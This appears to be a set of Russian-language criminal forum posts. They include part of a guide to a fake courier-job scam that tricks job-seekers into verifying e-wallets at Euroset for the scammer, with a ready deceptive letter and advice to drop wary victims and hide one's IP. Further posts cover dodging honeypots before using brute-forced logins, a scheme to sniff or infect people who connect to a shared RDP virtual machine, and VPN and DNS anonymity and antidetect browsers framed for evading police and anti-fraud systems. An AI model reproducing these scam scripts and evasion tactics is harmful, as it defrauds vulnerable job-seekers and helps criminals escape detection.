Топаем на следующие страницы: Яндекс.Деньги или QIWI Wallet, выбираем вариант "Платеж в "Евросети""
Яндекс.Деньги QIWI Wallet - здесь жмем на ссылку "Пройти идентификацию" или "Получить этот статус" и нас редиректит уже на соответствующую страницу. Очень внимательно заполняем данные мамонта и генерируем заявление в файл HTML. Это заявление сохраняем в файле HTML (правая кнопка мыши/сохранить как...) и передаем по электронной почте мамонту для распечатки.
После пишете письмо дропу с уже прикрепленным файлом нашего заявления:
"Приветствую! Вы утверждены и уже записаны в нашу команду курьеров.
Остается лишь последний шаг перед началом нашей с вами работы - идентификация.
К письму ниже прикреплено уже заполненное нами заявление для идентификации вашего электронного счета и личности.
Заявление нужно будет распечатать на листе формата А4.
Пройти идентификацию вы можете в абсолютно любом салоне "Евросети" на территории Российской Федерации.
Плата за идентификацию в "Евросети" будет 50 рублей.
Это оплата за идентификацию, которая предоставляет "Евросеть"
Вы можете возвратить эти деньги себе, сразу же после первичного заказа.
Вся процедура занимает всего пару минут. Главное - не забудьте взять паспорт!
После этой процедуры вы сможете спокойно передавать вырученные деньги через идентифицированный счет без каких-либо лимитов и других проблем. Эта процедура в основном помогает нам убедиться, что вы именно тот человек, кому принадлежит высланный вами скан паспорта.
С наилучшим пожеланием!
Маргаретт Афанасьева, главный менеджер по локализации данного проекта курьерской доставки на территории РФ."
прикрепленный HTML-файл

После этого человек своими двумя топает в Евросеть, идентифицирует нам счет, и уже вы получаете кошелек для продажи или использования его для разных целей. Убедитесь, что счет полностью идентифицировался. ПРОФИТ.
Важно. Ваш мамонт не будет иметь никакого доступа к данному кошельку, ведь вы лично открыли счет!
В принципе, при отборе мамонтов, умных сразу сливайте – зачем вам проблемы в будущем, вдруг он захочет получить доступ к кошельку (заблокировать его), не получив предлагаемой работы.
Вас будут спрашивать непосредственно о контракте/договоре и его подписании. Объясняйте тем, что они получают контракт с копией уже при получении первой мини-партии товара. Одну копию им нужно отослать обратно по почте. Всего этого, разумеется, не будет, но ведь нам нужна правдоподобная история.

Для того, чтобы мамонты не нервничали и не забрасывали вас письмами типа "когда уже начинаем работу?", нужно будет сразу указать начало работы приблизительно на месяц позднее относительно самой даты начала переписки между вами и прохождением идентификации.
Меняйте ваш mail/почту. Проработав, удаляйте полностью, но через некоторое время (может месяц-два). Возможно, что вам понадобится кому-нибудь написать, что работа, по определенным причинам, перенеслась на четыре месяца вперед. В переписках так же не забываем о безопасности (VPN/дедик/виртуалка) – запомните, ваш IP сохраняется в отправленных письмах.
Так же будьте креативны и часто придумывай новый текст для объявлений и писем, темы. Размещайте ваши объявления на различных сайтах и для различных регионов и областей. Чем дальше будет центр – тем меньше у нас параноиков и больший % безработных.
Возможно не только предлагать людям разную высокооплачиваемую/доходную работу, но и, допустим, как я писал выше, использовать строителей, предлагать работу, которая требует переезд в другой город, но оплачиваете все вы. Требуете идентификацию для передачи мамонту денег и снова профит. На самом деле, вариаций просто куча. Это один из самых распространеных, что я встречал в интернете и посчитал, что данная информация вполне актуальна для всех нас.

Honeypot check

ID: 676533bbb4103b69df371d8a
Thread ID: 26897
Created: 2018-12-15T18:20:32+0000
Last Post: 2018-12-15T18:20:32+0000
Author: xrahitel
Replies: 0 Views: 2K

Всем привет в продолжениятыц не большой обзор как не попасться на такую шляпу как Honeypot а проще говоря ловушку на борде много статей на эту тему. Один из методов, позволяющий осуществить эту идею, называется Honeypot (от англ. — «горшочек с медом»). Фактически представляет собой приманку, на которую в случае удачи и высокого фактора достоверности попадется злоумышленник. Задача Honeypot — подвергнуться атаке или несанкционированному исследованию, что позволит изучить стратегию злоумышленника и определить круг средств, с помощью которых могут быть нанесены удары по реальным объектам безопасности. Реализация Honeypot не принципиальна, это может быть как специальный выделенный сервер, так и один сетевой сервис, задача которого — привлечь внимание хакеров.

**

**
**[port-is-open-for-security](http://www.korznikov.com/2014/10/every-port-is- open-for-security.html) **

Особо следует остановиться на инсталляции и эксплуатации Honeypot. Как правило, весь комплекс мероприятий сводится к «установить и ждать». Наиболее распространен случай с выделенным сервером, находящимся под контролем специалистов. На сегодняшний день имеется множество программ-подделок, которые производят впечатление настоящих, но не являются таковыми, их основная задача — протоколировать весь обмен. Преимущество Honeypot в том, что копию ПО можно сделать на морально устаревшем сервере, не справляющемся с типичными вычислительными задачами электронного бизнеса,установка honeypot на примере

Ловушки используются и для реакции на вторжение примереДоморощенный honeypot своими руками . Если злоумышленник проник в сеть и одна из атакованных систем оказалась ловушкой, полезная информация, полученная от этой ловушки, применяется для ответа на атаку. Описанные преимущества могут вызвать иллюзию, будто Honeypot — идеальное средство для обеспечения максимальной безопасности. Увы, в силу ряда недостатков это не так, и Honeypotможет служить дополнением к имеющемуся комплексу средств защиты. В первую очередь нужно отметить узкую направленность конкретной ловушки, также существует вероятность обнаружения и опасность полного взлома Honeypot.

По части со стороны спецов мы поговорили можно и осветить с нашей стороны как это может выглядеть в повседневной жизни в сети.Все мы любим халяву когда нам подкидывают сс,дедик,почты и.т.д скажу сразу что сам лично воспринимаю такие дары всегда очень настороженно и вот почему к примеру сс всегда есть вероятность что картон который Вам дали не всегда есть халява а только для того что-бы посмотреть куда Вы вбиваете свой мат,дедики которые раздают в чатах и халявах не когда не беру только потому что не уверен что на него установили до меня а каждый проверять время тратить,проще купить новый амозоновский по части почты мы все прекрасно знаем как с легкостью так палят Ваш ip Вам дали ящик вы зашли посмотрели потом посмотрели Ваш ip по части прокси хороший пример тут.

**

**

**Хочешь бесплатно заполучить приватный эксплойт? Все, что для этого требуется

поднять свой собственный honeypot. Чтобы не рисковать домашним компьютером, идеальный вариант - использовать отдельный сервер. И тут оптимальным решением являются облачные сервисы компании Amazon, т.к. это быстро, дешево/бесплатно, надежно. Понадобится буквально 20 минут для того, чтобы поднять собственный сервер и превратить его в honeypot, отлавливающий все попытки проэксплуатировать свежую уязвимость в RDP протоколе.**

****

Не когда не обращаю внимания на такие объявления и по типу надо взломать сайт или борд по мне так это мусорское на 99% это конечно моё личное мнения решать Вам как не попасться на honeypot ну заключение прежде чем радоваться чтоtelnet открыт и админка сука с брутилась не забывайте чекнуть honeyscore.shodan.io Берегите себя и Своих Близких

[Как настроить Honeypot и как их избежать](https://null- byte.wonderhowto.com/how-to/hack-like-pro-set-up-honeypot-avoid- them-0153391/)

p.s добавлю ссылки;

1.honeypot-raspberry-pi
2.HoneypotBuster
3.honeypot Dionaea

Не устали :smile73: тогда мысли просто как замутить самому все дело VirtualBox подключение по RDP выше он разворачиваетhoneypot-na- amazon** так можно просто установить пару виртуалак и дать им доступ по нестандартному порту через мост тогда любой сможет подключаться к вашей виртуалки по RDP вот цитата:Удаленный доступ — это то, что я использую каждый день.**

С этой стороны особенно приятно, что к любой виртуальной машине VirtualBox можно удаленно подключиться и комфортно работать с ней, используя стандартный протокол RDP (Remode Desktop Protocol). Подойдут любые знакомые клиенты: виндовая утилита mstsc или, например, никсовый FreeRDP (www.freerdp.com). Для каждой виртуальной машины выделяется отдельный порт, поэтому нет никакой проблемы, чтобы запустить на хостовой машине сразу несколько виртуалок и в случае необходимости обращаться к любой из них.

Соответственно, все, что нужно для подключения — это указать IP-адрес хостовой машины с нужным портом. Стандартный виндовый клиент вызывается по команде mstsc. Под никсами выполнить подключение не менее просто через rdesktop, который в любом современном дистрибутиве установлен по умолчанию:

rdesktop host_system_ip:port

Включить доступ по RDP и назначить порт можно в настройках каждой виртуальной машины на вкладке «Удаленный дисплей». Для виртуалки с виндой можно оставить порт по умолчанию 3389 (имей в виду, что он может быть занят непосредственно сервером RDP хостовой машины а для машины с никсами — 3390 и т.д. Если планируется несколько одновременных подключений, необходимо активировать соответствующую опцию. Помимо этого здесь настраиваются параметры авторизации.

Самый небезопасный метод — полностью отключить процедуру аутентификации, но в этом случае доступ к виртуалке получит любой желающий. Вместо этого можно выбрать авторизацию через аккаунты хостовой системы или учетные записи гостевой системы. Для того, чтобы данные было невозможно отснифать, любая RPD- сессия шифруется с помощью симметричного RC4 алгоритма с 128-битным ключом, который меняется каждые 4096 отправленных пакетов.

Дальше снифаем весь трафик виртуальной машины,недаром во время установки VirtualBox под винду выводятся предупреждения, что все сетевые подключения будут на небольшое количество времени отключены. Программа устанавливает в систему дополнительные сетевые драйвера и виртуальные сетевые адаптеры. Их можно найти через диспетчер устройств: «VirtualBox Host-Only Ethernet Adapter» — то, о чем я говорю.

Весь трафик гостевой системы, конечно же, проходит через эти вспомогательные элементы. И вот за что разработчикам хочется в очередной раз сказать «Спасибо», так это за возможность записать весь трафик напрямую в pcap-файл. Да, для перехвата пакетов можно было воспользоваться и обычным сниффером (причем как под гостевой, так и под хостовой системой), но используя эту встроенную возможность VirtualBox, ты получаешь в распоряжение лог абсолютно всех пакетов, который отправила или получила гостевая ОС. Для включения записи сетевого трафика достаточно двух команд:

VBoxManage modifyvm [your-vm] --nictrace[adapternumber]
on --nictracefile[adapter-number] file.pcap
VirtualBox -startvm [your-vm]
Например, так:
VBoxManage modifyvm "ubuntu" --nictrace1 on
--nictracefile1 file.pcap
VirtualBox -startvm "ubuntu"

В результате в файле file.pcap будет полный дамп трафика, который можно изучить с помощью любого анализатора, например, Wireshark. Важно после всех экспериментов не забыть отключить логирование, иначе pcap-файлы будут разрастаться на диске (особенно если ты решишь скачать под гостевой ОС какие- то тяжелые файлы).

От сюда возник вопрос кто так делал по сути можно раздавать свою виртуалку как RDP или VNC и снифферить весь трафик статьи по теме [раз](http://integrator.adior.ru/index.php/virtualbox- setup/291-udalennyj-rabochij-stol-virtualnoj-mashiny-oracle-vm- virtualbox),два,[три](https://it- explain.com/blog/udalennyj_displej_virtualbox_nastrojka/2014-07-27-45)

Дальше вопрос по сути можно заразить через виртуалку гипотетически , если есть общие папки с хозяйской системой, к которым гостевая ось имеет право на запись. Тогда если вирус пропишется в эту общую папку и ты случайно запустишь файл с нее на хозяйской ОС, тогда заразишься,почитав не многотыц пришел к мысли что если если раздать свою виртуалку как RDP то можно использовать данную атаку RDPInception и заразить кто будет подключаться к Вашей виртушки,понятно что терпила должен сделать общие папки с виртушкой но это другой вопрос меня больше интересовало с работает это или нет...в приведенном контексте хотя-бы теоретически да или нет..

© rewrite

Что нужно знать про VPN

ID: 676533bbb4103b69df371d8c
Thread ID: 26751
Created: 2018-12-06T08:15:57+0000
Last Post: 2018-12-12T11:55:06+0000
Author: xrahitel
Replies: 1 Views: 2K

Хочу провести небольшой ликбез по безопасности. К сожалению, не каждая реализация VPN даёт вам анонимность,рассмотрим, как работает VPN.

****

VPN — это, своего рода, тоннель, по которому передаются зашифрованные данные. Ваш провайдер не имеет возможности увидеть, на какие сайты вы заходите, что там пишите и т.д. Также сайт, который вы посещаете, получает не ваш реальный IP адрес, а адрес VPN сервера. Казалось бы, прекрасная защита и тревожиться не о чем. На самом деле, всё не так.В настоящее время коммерческими провайдерами предлагаются следующие протоколы VPN:

PPTP – используется наиболее широко, быстрый, легко настраивается, однако считается «наименее защищённым» по сравнению с остальными;

L2TP + IPSec. L2TP обеспечивает транспорт, а IPSec отвечает за шифрование. Данная связка имеет более сильное шифрование, чем PPTP, устойчива к уязвимостям PPTP, обеспечивает также целостность сообщений и аутентификацию сторон;

OpenVPN – безопасный, открытый, а, следовательно, распространённый, позволяет обходить многие блокировки, но требует отдельного программного клиента;

SSTP – такой же безопасный, как и OpenVPN, отдельного клиента не требует, однако сильно ограничен в платформах: Vista SP1, Win7, Win8.

Как правило, большинство людей пользуются бесплатными VPN (которых полно в сети) и они, как правило, предоставляют следующие протоколы — PPTP и OpenVPN. Если у вас на компьютере, планшете, телефоне не стоит отдельный программный клиент, то вы, скорее всего, подключены по протоколу PPTP. Как вы уже прочли, этот протокол наименее защищён.

Теперь нужно сделать лирическое отступление и рассказать, как ваш браузер загружает нужный сайт. Когда вы в адресной строке вводите URL cайта (или переходите по ссылке) — буквенное название переводится в IP адрес сайта. IP адрес представляет собой 32-битовое число. Удобной формой записи IP адреса является запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками, например, 192.168.0.3. Это IP адрес так называемой четвёртой версии протокола IP (ipv4), но мало кто знает, что есть шестая версия протокола IP и там адрес выглядит совсем иначе.

В 6-й версии IP-адрес (IPv6) является 128-битовым. Внутри адреса разделителем является двоеточие (напр. 2001:0db8:85a3:0000:0000:8a2e:0370:7334). Ведущие нули допускается в записи опускать. Нулевые группы, идущие подряд, могут быть опущены, вместо них ставится двойное двоеточие (fe80:0:0:0:0:0:0:1 можно записать как fe80::1). Более одного такого пропуска в адресе не допускается. Протоколы ipv4 и ipv6 не совместимы друг другом.

А теперь внимание!!!!!!!!!!!!!!

Многие реализации VPN не ПОДДЕРЖИВАЮТ или, что еще хуже, ПОЛНОСТЬЮ ИГНОРИРУЮТ протокол IPv6. Как это понимать? Объясню! Допустим, кто то хочет вычислить кто вы и откуда. Он создаёт сайт наживку (этот сайт может быть, как две капли воды похожий на оригинальный) или просто какой-то сайт (допустим, порно материалами), и присваивает этому сайту IP адрес протокола ipv6. Вы, думая что защищены VPN, без опаски идёте на такой сайт.

Но, как я написал раньше, многие реализации VPN не поддерживают или, что еще хуже, полностью игнорируют протокол IPv6. То есть, VPN сервер не может выполнить свою работу – скрыть ваш реальный ip адрес и зашифровать данные. Поэтому вы, того не ведая, работаете прямо с таким сайтом. Следовательно, владелец такого сайта видит ваш реальный IP плюс ваш провайдер знает, что вы ходили на этот сайт. Стоит ли говорить, чем такое знание может закончиться для вас? Думаю, всё понятно. Берегите себя. Не ходите по ссылкам, которые вы получили “из надёжных источников”, даже если вам прислали их друзья. Проверяйте сайты, даже если они вам внушают доверие и там патриотизм и нет ваты.

Проверить сайт можно легко у себя на компьютере: нажмите сочетание клавиш Win + r, введите cmd и нажмите OK.
Или нажмите Пуск -> Все программы -> Стандартные -> Команд. Строка
Когда откроется окно командной строки введите ping (потом введите пробел) и после пробела буквенный адрес сайта.

Например, адрес сайтаtwitter.com Мы должны ввести ping twitter.com и нажать ОК.

Что мы видим? Что сайт подключен через протокол интернета ipv4 ( красным выделен IP адрес версии ipv4). Следовательно, VPN будет обеспечивать вашу анонимность!Но может быть по-другому! Например, вы увидели незнакомую ссылку или вам порекомендовали какой-то сайт. Пусть, к примеру, это будет сайт he.net

Как видим, сайт находится на IP адресе шестой версии (ipv6). Поэтому VPN НЕ ПОМОЖЕТ! Владелец сайта будет знать ваш реальный IP и ваш провайдер узнает, что вы там были. Если сайт создан, как ловушка, то концовку додумайте сами!.. Более безопасно проверять IP адрес cайта можно с помощью этого онлайн- сервиса.centralops.net в поле «domain or IP address» введите URL проверяемого сайта и нажмите кнопку «go». Пример на картинке

Чтобы быть точно уверенным в своей анонимности, достаточно узнать по какому протоколу вы используете VPN и поддерживается ли провайдером, который предоставляет VPN, протокол ipv6.Автор статьи не говорит каждую ссылку проверять но вот если Вам прислал не известный хулиган то да Дальше решил проверить данный факт так вот смотрим скриншот пошел сюда [ru.smart-ip.net](http://ru.smart- ip.net/geoip/2400:cb00:2048:1::681c:1a6a/aaaa) про чекать IPv6 как видим страна Гонконг

Про чекал больше ста бордов 80% использовали протокол IPv6 думаю не х.. себе сказочка поставил расширения[if ipv6](https://chrome.google.com/webstore/detail/if- ipv6/nhemcdhdcfnncaemhjigipnloogkhpgg) но глухо не один борд из 80% не показал использования данного протокола

Ответ мне googl как всегда дал,все ниже перечисленные сайты используютWe’ve Enabled IPv6 to Help You Join the Modern Web! читайте вникайте

В том топе у поменялось про Vpn с поддержкой IPv6 вот список VPN, которые были протестированы для защиты как IPv4, так и IPv6 (без утечек IP-адресов), см.Список лучших VPN-списков чекнуть можно на утечку тут [test-ipv6.com](http://test- ipv6.com/)

p.s не забываем про это

**

**

© rewrite

Анонимность DNS-запросов. Скрываем DNS.

ID: 676533bbb4103b69df371d8f
Thread ID: 26806
Created: 2018-12-08T11:32:29+0000
Last Post: 2018-12-08T16:21:50+0000
Author: Fogg
Replies: 1 Views: 2K

Анонимность DNS-запросов (кэширование+шифрование)
Любой человек, который задумывается об анонимности в интернете знает отличный способ скрыть свой IP-адрес в интернете – это VPN-сервис. Однако даже при VPN- соединении зачастую запросы к DNS-серверу остаются незащищенными, и можно запросто отследить куда идут ваши DNS-запросы. По другому это называется “DNSleaks” или «утечка DNS».
Давайте рассмотрим поподробнее что такое DNS и какие существуют проблемы.
Как известно, каждый компьютер в сети Интернет имеет свой IP-адрес, не зная IP-адреса компьютера, невозможно отправить ему информацию или запрос. IP-адрес имеет вид 4-х байтового числа, разделенного точками (например, 162.234.12.110 или 78.31.54.226).
Для простого человека запомнить большое количество IP-адресов не легко, поэтому в начале развития сети Интернет возникла необходимость в средстве, которое должно было бы облегчить жизнь пользователям Интернета. Таким средством стала ДНС - система доменных имен. ДНС сервер - это средство, которое позволяет определить IP-адрес по доменному имени.
К примеру вы ввели в строке браузера адрес сайта, браузер послал запрос на DNS-сервер, который указан в настройках вашего интернет-подключения. Сервер отправляет обратно пакет с ответом, в котором содержится IP-адрес нужного сайта.
С одной стороны всё сделано удобно – вы просто воткнули кабель в сетевую карту, вам автоматически присвоили DNS-сервер провайдера с быстрым откликом и всё работает. Но с другой стороны есть две проблемы при такой схеме:

Отсутствует шифрование соединения. Это значит что любой злоумышленник сможет перехватить ваш трафик и сделать подмену IP-адреса. Например, показать вам поддельную страницу интернет-банка. Также желательно скрыть этот трафик от провайдера или от правоохранительных органов (мало ли что J).

DNS-сервера провайдеров по закону обязаны сохранять логи (с какого IP, на какие сайты заходили, и время соединения), а также по запросу от правоохранительных органов предоставлять эти логи (я надеюсь, все знали это? J). Скажу даже больше, 99% DNS-серверов мира пишут логи и не скрывают этого.
Если вдруг вы не хотите чтобы ваши данные кто то перехватывал или читал логи ваших посещений есть надёжный вариант. Что нужно сделать:

Нужно зашифровать соединение. Для этого существует программа DNSproxy. Она соединяется к DNS-серверу не напрямую, а зашифровано через DNS-резольвер (он просто редиректит запросы на DNS-сервер). В свою очередь резольвер передаёт данные DNS-серверу тоже по зашифрованному соединению. То есть таким образом с помощью снифферов (например WIreshark) можно лишь узнать IP-адрес резольвера. Но поскольку пакеты зашифрованы с помощью «Elliptic curve cryptography» (эллиптическая криптография), то с каким конкретно DNS-сервером мы обмениваемся данными определить невозможно.

Нужно использовать DNS-сервера, которые не ведут логов. Как Вы сами понимаете, сервера провайдера сразу отпадают. Также для анонимности нельзя использовать DNS-сервера Гугла или Яндекса, поскольку они честно признаются в хранении информации (почитайте их Соглашения о Конфиденциальности). Но есть DNS-сервера, которые нам помогут. Это www.opennicproject.org. На сайте написано, что сервера не пишут никаких логов (ну что ж, поверим). Но, к сожалению, эти сервера нестабильны и иногда отваливаются. Для решения этой проблемы можно использовать программу " Acrylic DNS Proxy". Она позволяет делать запросы не на один DNS-сервер, а на 10 сразу. И пакет с того сервера, который придёт быстрее всех будет принят программой. Следовательно мы решим сразу две задачи – минимизируем потерю скорости запросов (потому что наиболее быстрый обмен данными как правило происходит с DNS-серверами провайдера), и нивелируем нестабильность каких либо серверов.
Итак, нам нужно зашифровать соединение на безопасные DNS сервера. Это пригодится не только для тех, кто не использует VPN (как можно решить проблему утечки DNS будет написано позднее).
Начнём:

Качаем AcrylicDNSProxy отсюда: http://mayakron.altervista.org/wikibase/show.php?id=AcrylicHome
Устанавливаем. Меняем файл конфигурации в папке с установленной программой на уже настроенный на сервера www.opennicproject.org. Уже настроенный мной конфигурационный файл тут: https://www.sendspace.com/file/u51lus

В настройках вашего сетевого подключения нужно прописать вручную DNS-адрес. Заходим «Центр управление сетями и общим доступом» -> «Подключение по локальной сети» -> «Свойства» -> «Протокол интернета версии 4 TCP/IPv4». Там ставим 127.0.0.1. Вторую строчку нужно оставить пустой.

Чтобы запустить AcrylicDNSProxy заходим через Пуск и нажимаем «Start Acrylic Service». Должно появиться сообщение об удачном запуске.
4) Теперь проверяем наши DNS-сервера на сайте www.perfect-privacy.com/dns- leaktest .
Рис. 2Можете добавить файл AcrylicController.exe в автозагрузку.
5) Теперь шифруем наши запросы к DNS-серверам с помощью программы DNScrypt.
Качаем уже готовую сборку: https://www.sendspace.com/file/o1pe2q
6) Распаковываем и запускаем dnscrypt-winclient.exe. Там выбираем свою сетевую карту и нажимаем Install. Теперь соединение с DNS-серверами зашифровано.
7) Проверим что же теперь покажут нам наши сервисы проверки. Заходим на [www.perfect-privacy.com/dns-leaktest](https://www.perfect-privacy.com/dns- leaktest) . Ни один наш сервер не должен определиться.
А если зайти на http://whoer.net, то единственное что он может показать – это адрес DNS-резольвера, через которые проходят DNS-запросы. Сами же сервера «неизвестны»

VPN + DNS-шифрование
Есть уязвимость – DNS-запросы могут отправляться одновременно и через VPN- сервер, и напрямую к указанному DNS-серверу вашего сетевого подключения.
Казалось бы, можно просто вручную прописать DNS-сервер в настройках соединения как 127.0.0.1, чтобы не было никаких лишних запросов к DNS провайдера. Но, очевидно, что при отключении от VPN интернет работать не будет, поскольку при подключении к VPN используются их собственные DNS-сервера. Если же просто вписать два сервера проекта www.opennicproject.org, то это снизит скорость серфинга в интернете, когда VPNбудет отключен. В этом случае так же рекомендуется установить программу AcrylicDNSProxy, которая не позволит упасть скорости серфинга. Но раз установили AcrylicDNSProxy, то почему бы и не установить и DNScrypt?

Если же вы 100% времени пользуетесь VPN-сервисами, то можете просто прописать один IP-адрес в настройках DNS: 127.0.0.1. Этого будет достаточно.
Таким образом, была найдена интересная схема, позволяющая анонимизировать и скрыть DNS-запросы, что немного поможет если столкнётесь с «органами», и если местный злой хакер решит перенаправить DNS-запросы и показывать вашим детям сайты вместо «Ну погоди» - сайты для взрослых.
Примечание: если же вам всё это ни к чему, просто установите AcrylicDNSProxy с указанием серверов вашего провайдера, Яндекса, Гугла и т.д., что даст вам ощутимое ускорение интернет-серфинга.

Кратко безопасности о Apple, Mac OS и Macbook

ID: 676533bbb4103b69df371d92
Thread ID: 26723
Created: 2018-12-03T14:56:54+0000
Last Post: 2018-12-05T15:25:54+0000
Author: tabac
Replies: 5 Views: 2K

Кратко безопасности о Apple, Mac OS и Macbook

С каждым днем всё больше и больше пользователей стараются переходить на технику Apple. Это удобно, необычно, красиво и очень понтовито по сравнению с Windows. Если с ПК на базе Windows многие знакомы ещё со школьной скамьи (допустим опыт лет 10-15), то на Mac OS большинство переходит уже в более зрелом возрасте , когда может самостоятельно позволить себе купить эту технику. Однако, вместе с переходом на Mac OS пользователь получает массу проблем, о которых даже не догадывается.

Вспомните свое первое знакомство с Windows, вспомните какими беспомощными вы были когда удаляли программы просто в корзину, а не анинсталлером или, когда не знали, что такое диспетчер задач и использовали кнопку Reset, или, например, когда скачивали пиратский софт или игру, у которой вирусов больше чем у вокзальной проститутки.

Помните эти времена? А теперь Задайте себе вопрос - поумнели ли вы с тех пор? Конечно поумнели, и, даже если вы всю жизнь тупо потратили на компьютерные игры, все сопутствующие моменты работы с ОС Windows дали вам одну незаменимую вещь - ОПЫТ. И теперь потратив несколько тысяч долларов на технику Apple вы снова вернулись на 10 лет назад, вы снова совершаете банальные ошибки, о которых даже не догадываетесь.

Самая распространённая проблема пользователей Mac OS - это беспечность. Откуда же взялась эта беспечность? Что она из себя представляет? Беспечность пользователей Mac OS является следствием мутировавшего мифа, этот миф вы все знаете - "Для Linux нет вирусов". Слышали такое утверждение? Наверняка слышали, но как вы думаете - это правда? Миф "Для Linux нет вирусов" был рожден маркетологами для еще одного преимущества в борьбе с Windows, но в своей основе он имеет совершенно другие «ценности»:

Видовое разнообразие

Программы в Linux — это не только бинарные ELF, но и множество скриптов на разных языках. Для эффективного размножения вирус должен учитывать все основные скриптовые языки программирования. Вирус для Windows должен научиться заражать только один тип файлов — exe — и вся система в его распоряжении.

Зоопарк дистрибутивов приходит на помощь

Широкое разнообразие дистрибутивов, форматов пакетов и архитектур значительным образом снижает способность вируса к распространению. Даже разработчикам легальных программ трудно предусмотреть все конфигурации и побороть фрагментацию.

Минимум полномочий

Постоянно работать под root в Linux невозможно — программы замордуют предупреждениями. А в Windows работа под администратором поощряется. Согласно новым исследованиям, 81% пользователей Windows используют полномочия администраторов при повседневной работе. Результат — Windows засорен вирусами, фанаты Linux ни одного вируса в живую не видели.

Продвинутые технологии

Особо хитрые линуксоиды запускают подозрительные программы в изолированных средах выполнения, например через chroot. И всё, распространение вредоносного кода по файловой системе невозможно. Фанаты Windows наслаждаются рекламой и телеметрией в своей любимой ОС, а в это время вирусы размножаются и воруют данные.

Прочитали? А знаете что лежит в основе каждого из пунктов? Опыт, знания, необходимость!

А как же Mac OS? Mac OS и Linux это ведь родственники? У них у обоих есть похожий Posix! Спешу вас огорчить, реальная картина такова, что Linux и Mac OS хоть и являются родственниками, но очень дальними и общего между ними кроме Posix очень мало.

Давайте сравним указанные выше принципы безопасности Linux и Mac OS

Как вам такая картина?

А если эту картину мы дополним хронологией самых опасных вирусов? https://www.iphones.ru/iNotes/477697

Mac OS должен приносить людям радость, удобство, это не просто операционная система это целая философия Apple и прочие бла бла бла.

Mac OS = Apple
Apple = Понты
Понты = Публичная демонстрация финансов
Публичная демонстрация финансов = Внимание со стороны криминалитета.

Давайте представим себе ситуацию:

Есть мальчик Сережа, этот мальчик верстальщик, рекламщик, программист или кто- либо из ноулайферов. Мальчику Сереже очень нравиться девочка Алена, но девочке Алене не нравятся дохлые ботаны, но, в то же время, нравятся деньги этих дохлых ботанов. Поэтому, когда мальчик Сережа попробовал притулить вялого к девочке Алене, она ему сказала – «Я хочу модный красивый и мощный ноут, чтобы с падружками в скайпе тусить и вкантакте цитаты постить! Купи мне такой и тогда мы подружимся».

Перед мальчиком Сережей встал теперь еще и выбор: «Купить ей ноут System76 и накатить туда чистый Debian? Она поймет какой я крутой и стопудово даст» или же… «Куплю ей Макбук последней модели и синхронизирую с ее айфоном, я жэ не ботан какой-то».

Как вы думаете – какое из действий принесет разнообразие в сексуальную жизнь Сережи? Конечно же оба! Только в первом случае ноутбук вставят Сереже в анус, а во втором случае вставит уже Сережа. И таких людей, как Алена и Сережа, – миллионы. А знаете кто они? Лохи.

Если вы в безлюдном переулке встретите дрыща, у которого цепь золотая грамм на 100 и часы с турбийоном, вы наверняка захотите эти вещи у него изъять, вот так-же и производители вредоносного ПО. Они понимают что Алена или Сережа - это просто лохи, у которых есть бабло и, как говорил, О.Генри «Многие каждый шиллинг в чужом кармане воспринимают как личное оскорбление.»

Невозможно проводить параллели между высокотехнологичным Linux и стандартизированным MacOS. А знаете к чему приводит стандартизация? А приводит она, так же как и в Windows, к стандартизированным методам атак вредоносным ПО.

(c) VektorT13

Актуальны ли современные браузерные антидетекты?

ID: 676533bbb4103b69df371d95
Thread ID: 26655
Created: 2018-11-27T10:51:46+0000
Last Post: 2018-11-27T12:19:20+0000
Author: tabac
Replies: 3 Views: 2K

Актуальны ли современные браузерные антидетекты?

Антифрод системы как неотъемлемая часть сектора ИБ постоянно развиваются и точно так-же как и в ИБ для эффективной работы необходимо ежедневно, ежечасно, а иногда даже ежеминутно поддерживать актуальность информации т.к. уязвимости появляются каждый день. Но что будет, если мы поверим в волшебство волшебного софта?

Как работает WebGL?

WebGL это технология построения 3D графики (мы же помним, что например Canvas это 2D) и основана эта технология на ускорителе OpenGL, а если быть более точным, то на OpenGL ES.

Работает WebGL так - Веб-сайт передает на наш ПК javascript код, который обрабатывается нашим браузером в двух режимах:
1. Программное ускорение
2. Аппаратное ускорение

Поскольку javascript выполняется только на ПК пользователя, то указанные выше ускорители будут использоваться не с сервера, а с нашего обычного рабочего или домашнего ПК.

Алгоритм следующий:
1. Формируются вершины
2. Формируются вершинные шейдеры (Vertex shader)
3. Между вершинами рисуются линии и появляется форма изображения
4. Добавляется геометрия
5. Формируются пиксели
6. Пиксели заполняются цветом (Pixel shader)
7. Добавляются эффекты (сглаживание, прозрачность и т.д.)

И все – картинка готова. Для пользователя это займет мгновение, но количество операций которое будет выполнено просто колоссально и во всем этом принимают участие сотни различных графических параметров. Думаете, сайт Browserleaks покажет вам их все? Нет, сайт browserleaks как и другие сайты чекеры знаете откуда взяли свой код? Они его тупо скопировали у Валентина Васильева: https://github.com/Valve/fingerprintjs.

Но данный код является лишь вариантом данного разработчика и количество параметров, от которых он отталкивается в формировании отпечатка может быть очень сильно увеличено.

Вот реальное количество параметров участвующих в обработке графики:
https://developer.mozilla.org/en-US/docs/Web/API/WebGL_API/Constants

Где хранятся эти параметры?

Хранятся параметры обработки графики не в браузере – в браузере хранятся лишь их адреса в ячейках памяти, а вот реальное их местоположение - это графический ускоритель.
Чуть выше мы с вами уже изучили, что ускорителей может быть два:
1. Программный (например SwiftShader)
2. Аппаратный (OpenGL ES (Angle transfer for Win) -> Direct3D. Или просто – наша видеокарта.

Как антидетекты подменяют их?

Все известные мне браузерные антидетекты нацелены только лишь на подмену значений сайта browserleaks и не более – зачем подменять то, что пользователь не видит, отпечаток меняется - и так сойдет.

На данный момент преимущественно используется программное ускорение (например в Chrome это SwiftShader) и используют его т.к. есть возможность редактировать его параметры и тупо для большей совместимости.

Как вы думаете это хорошо?

Давайте подумаем, мы используем антидетект, который например подменил название нашей карты на GeForce GTX 1080 – все сайты должны видеть что у нас карта GTX 1080, верно?
На самом деле нет и антидетекты меняют всего навсего строковый параметр – тупо текст.

Хотите пруфы?

Исходный код хрома - https://github.com/chromium/chromiu...0b787d58a31ed8fc8bcb/ui/gl/gl_version_info.cc
Строка 52 (условие программного ускорения)
И вы туда можете написать все что хотите, хоть – “GeForce MegaPizdec 100500”
И после этого вы думаете у вас в вашем ПК она вырастет? Отпочкуется от основной видеокарты?
Нет, у вас как были параметры программного ускорителя, так они и остались, а поменялся тупо текст.

Как же поменять параметры графики? Может быть это сделали?

Да, подменить константное значение действительно можно и все параметры (которые мы видим например на https://browserleaks.com/webgl под нашими отпечатками действительно будут меняться и мы даже вручную их можем выбрать – правда классно?
